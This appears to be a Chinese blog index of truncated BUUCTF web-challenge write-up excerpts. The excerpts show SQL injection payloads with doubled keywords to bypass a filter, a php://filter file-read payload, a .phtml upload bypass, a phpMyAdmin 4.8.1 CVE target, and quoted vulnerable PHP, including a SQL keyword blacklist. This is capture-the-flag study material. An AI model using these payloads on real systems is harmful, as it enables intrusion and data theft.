回归初心，刷题快乐。 [WesternCTF2018]shrine 源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return ope…

[GWCTF 2019]我有一个数据库 没猜到有个数据库。 访问页面/phpmyadmin/，没有密码，不过也没有表，找一下版本号4.8.1，找CVE打。 下载4.8.1的源码。由于找不到，直接把题目环境扒下来了。 // If we have a valid target, let's load that script instead if (! …

<?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GE…

[SUCTF 2019]CheckIn 题目源码： <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> …

[极客大挑战 2019]BabySQL 尝试联合注入 1' union select 1# 发现只报错了1，推测被过滤，双写绕过 1' ununionion seselectlect 1 # 尝试到3后成功注入，有回显 1' ununionion seselectlect 1,2,3# 爆库 1' ununionion seselectlect 1…

[HCTF 2018]admin 进了Login界面就有了 [极客大挑战 2019]Upload 一步步推测：当上传一个php文件时，返回 通过修改文件类型 image/gif，返回 因此可以推断，修改文件类型绕过了第一层WAF，第二层WAF应该是基于文件后缀名来判断的。 逐个尝试可以使用的后缀名，发现.phtml后缀名是可以使用的，出现了第三层W…

[ACTF2020新生赛]Include 这题考察的是文件包含的php协议，一句话解决： php://filter/read=convert.base64-encode/resource=flag.php [ACTF2020新生赛]BackupFile 提示给了备份文件，试着访问 index.php.bak 拿到源码： <?php inclu…

黑盒盲注没注出来，直接上源码吧： <?php if (isset($_POST['query'])) { $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete…

这道题在我刚入门CTF一年前的时候碰到过，只是当时根本不知道这道题为什么这么解，所以就搁置了。 最近开始刷BUU，算是重新写一下wp吧。 解决方案 进来一个滑稽表情包，查看页面源码，得到提示 <-- source.php --> 访问source.php，查看源码： <?php highlight_file(__FILE__); cla…

难度一般 就是自己蔡